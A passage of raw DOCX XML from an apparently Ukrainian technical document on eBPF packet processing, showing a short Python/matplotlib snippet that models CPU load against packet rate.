      <w:r w:rsidR="007A4DA9" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обробки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> одного пакету.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> код:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Данні</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>np</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(10000, 1000000, 100)  # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Кількість</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>пакетів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> на секунду</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 5000  # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Кількість</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>тактів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> на пакет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>max</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 2.5</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">9  # Максимальна </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>кількість</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>тактів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> на секунду</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>max</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 2</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">-6  # Час </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>обробки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> одного пакету (2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>мкс</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Обчислення</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>навантаження</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) / (</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>max</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>max</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Побудова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>графіку</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plot</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4DA9" w:rsidRPr="003C7FE5" w:rsidRDefault="007A4DA9" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Навантаження</w:t>
      </w:r>
